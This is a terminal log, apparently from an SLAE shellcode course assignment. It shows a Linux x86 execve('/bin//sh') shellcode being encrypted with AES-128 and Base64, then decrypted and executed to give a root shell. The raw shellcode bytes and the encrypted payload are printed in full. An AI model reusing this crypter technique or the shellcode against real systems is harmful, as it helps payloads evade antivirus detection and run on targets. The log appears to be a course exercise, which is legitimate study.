Step 1:

root@kali:/home/SLAE/MY_EXP/Assignment7# python AESEncryption.py '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
Encrypted Shellcode Using AES 128 & Base64


5CJtU2PsI+erEYEb0l/3xiQvT0P0eeArByo4NEbKDb3n8dvPUM9H04Q8FCEK06HT7VlgveJoGWQDjXszmOjUkP0OvPf0OrefgZ/eRqrryx95REGDTPhOzCbPEY0el9s4zIV4N0lvsnFNy/o/aCRGOg==
root@kali:/home/SLAE/MY_EXP/Assignment7#


Step 2:

root@kali:/home/SLAE/MY_EXP/Assignment7# ps
  PID TTY          TIME CMD
 1979 pts/1    00:00:02 bash
 4042 pts/1    00:00:00 ps
root@kali:/home/SLAE/MY_EXP/Assignment7#

Step 3:

root@kali:/home/SLAE/MY_EXP/Assignment7#  python AESDecryption.py
Decrypted shellcode(AES 128 & Base64): \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
# ps
  PID TTY          TIME CMD
 1979 pts/1    00:00:02 bash
 4043 pts/1    00:00:00 sh
 4044 pts/1    00:00:00 ps
#
# id
uid=0(root) gid=0(root) groups=0(root)
#


